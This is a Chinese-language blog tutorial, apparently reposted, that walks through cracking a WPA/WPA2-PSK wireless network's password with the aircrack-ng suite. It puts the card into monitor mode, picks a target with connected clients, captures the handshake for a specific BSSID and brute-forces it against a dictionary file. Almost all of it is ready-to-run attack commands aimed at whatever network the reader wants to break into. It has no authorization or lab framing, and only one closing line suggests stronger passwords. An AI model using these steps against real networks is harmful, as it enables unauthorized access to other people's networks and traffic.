aircrack-ng破解安全性为WPA/WPA2 PSK的无线网络

1.ifconfig -a

   使用该命令查看本机的无线网卡


2.ifconfig
       使用该命令查看本机已启动的无线网卡

       可以发现wlan1,这一网卡并没有显示在上面.如果想使用它进行下面的破解密码操作,首先使用ifconfig wlan1 up启动它.
3.airmon-ng check kill

      使用该命令kill一些会影响接下来的操作的进程

4.airmon-ng start wlan0

      使用该命令使wlan0网卡开启monitor mode

5.airodump-ng wlan0mon

      使用该命令查看附近的无线网络

      选择一个你想破解密码的无线网络,记下它的BSSID、CH(channel),下面的命令会用到.  BSSID  STATION  PWR  RATE......下面显示的是有终端连接的无线网络.

      注意最好选择有终端连接的无线网络,即选择在上边的图片中BSSID  STATION  PWR  RATE......下面出现的BSSID,因为这些BSSID有终端连接,如手机、平板等,

      选择这些更容易抓到handshake包(即用于连接无线网络时发送的认证包),当然也可以选择没在BSSID  STATION  PWR  RATE......下面出现的BSSID,现在没有  终端连接,可能         在我们抓包的过程中会有终端连接进来.
6.airodump-ng  --bssid F0:B4:29:29:8A:03 -c 3 -w crack wlan0mon
      使用该命令抓取某个无线网络的数据包,命令参数解释:bssid、c为filter option;w后面的crack是存放抓取后的数据包的文件名,自定义即可.


7.等待,直到抓到handshake包

8.aircrack-ng -w /tmp/WPADict.txt crack-01.cap

     使用该命令通过密码字典文件暴力破解该无线网络的密码.


9.破解出密码

     如果足够幸运即密码字典文件中有这一无线网络的密码,那么一段时间后(5、6个小时甚至更长都有可能)就可以找到这一密码.

  如果密码字典文件中没有这一密码,则破解不出该无线网络的密码.

可以看出设计一个复杂的密码,可以降低被破解的几率.
10.airmon-ng stop wlan0mon

使用该命令关闭wlan0无线网卡monitor mode

猜你喜欢

转载自iaiai.iteye.com/blog/2377723
今日推荐